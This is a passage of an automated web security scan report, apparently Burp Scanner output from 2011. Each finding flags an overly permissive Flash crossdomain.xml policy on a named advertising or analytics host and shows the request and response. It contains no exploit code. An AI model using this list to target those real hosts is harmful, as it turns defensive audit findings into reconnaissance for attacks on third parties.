...[SNIP]...

6.36. http://init.lingospot.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://init.lingospot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: init.lingospot.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=7200
Content-Type: text/xml
Etag: "-5d35a762ba6b2244"
Last-Modified: Sun, 04 Sep 2011 00:58:31 GMT
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:58:31 GMT
Server: Google Frontend

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.37. http://js.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.38. http://load.exelator.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3801752829"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sun, 04 Sep 2011 01:10:56 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

6.39. http://load.tubemogul.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://load.tubemogul.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313195660000"
Last-Modified: Sat, 13 Aug 2011 00:34:20 GMT
host: rcv-srv34
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:17:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.40. http://log.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://log.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: Keep-Alive
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.41. http://metrics.sprint.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:11 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.42. http://motifcdn2.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://motifcdn2.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: motifcdn2.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2179194/HYSA_Champion_Asterisk_300x250_30k.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "adb6a2c1ae7705ddf1599956b34e42c2:1222813852"
Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT
Accept-Ranges: bytes
Content-Type: application/xml
Vary: Accept-Encoding
Content-Length: 339
Date: Sun, 04 Sep 2011 00:43:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.43. http://nmcharlotte.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmcharlotte.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:26 GMT
Server: Omniture DC/2.0.0
xserver: www28
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.44. http://odb.outbrain.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.45. http://p.brilig.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:45:29 GMT
ETag: "55fb1-ab-4a86245412040"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=75
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>

6.46. http://paid.outbrain.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://paid.outbrain.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 01:23:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.47. http://pbid.pro-market.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app2.ny
ETag: W/"207-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: application/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 01:10:59 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.48. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:42:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.49. http://pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:06 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.50. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.51. http://premium.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.52. http://qlog.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://qlog.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: qlog.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; rtbData0="key=tidaltv:value=dd4e867c-c693-47de-91e1-d466af06b7be:expiresAt=Wed+Nov+02+17%3A44%3A51+PDT+2011:32-Compatible=true"

Response

6.53. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 01:06:01 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 01:06:00 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.54. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rcv-srv48.inplay.tubemogul.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rcv-srv48.inplay.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314384909000"
Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT
host: rcv-srv48
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:28:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.55. http://receive.inplay.tubemogul.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://receive.inplay.tubemogul.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314196443000"
Last-Modified: Wed, 24 Aug 2011 14:34:03 GMT
host: rcv-srv17
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:17:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.56. http://redir.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redir.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: redir.adap.tv

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c4eab00cd774ab5a7cc17b4370cc452:1314901110"
Last-Modified: Thu, 01 Sep 2011 18:18:30 GMT
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:05:28 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-po
...[SNIP]...

6.57. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:16:31 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5295
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.58. http://s3.cinesport.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s3.cinesport.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.cinesport.com

Response

HTTP/1.1 200 OK
x-amz-id-2: HJPWt1++478t1MkKTXsRWRAZcqPlaICP21rPc6XhuXcwNUsultrjb1lWrGlrIox4
x-amz-request-id: 832C78F5B320E530
Date: Sun, 04 Sep 2011 01:03:57 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.59. http://search.spotxchange.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.spotxchange.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.spotxchange.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:45 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT
ETag: "c41e69-8b-4d6c32ef"
Accept-Ranges: bytes
Content-Length: 139
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.60. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:52:32 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:52:32 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.61. http://segments.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segments.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.62. http://simg.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://simg.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: simg.zedo.com

Response

HTTP/1.0 200 OK
Age: 0
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:05:11 GMT
Edge-Control: dca=esi
ETag: "32e623-f7-44d91a42f42c0"
Last-Modified: Mon, 19 May 2008 09:03:47 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ZEDO 3G
Content-Length: 247
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.63. https://socialize.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://socialize.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: socialize.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web503
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:24:16 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.64. http://sprint.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sprint.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sprint.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:45:31 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.65. http://statse.webtrendslive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.66. http://studio-5.financialcontent.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://studio-5.financialcontent.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: studio-5.financialcontent.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:19 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sun, 04 Sep 2011 01:24:19 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.67. http://sync.adap.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

6.68. http://sync.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Set-Cookie: ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.69. http://sync.tidaltv.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.tidaltv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: sync.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:11:58 GMT
ETag: "da861e55beecca1:17eb"
Last-Modified: Thu, 06 May 2010 01:49:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 78
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.70. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:48:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "11003d9-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.71. http://tcr.tynt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tcr.tynt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
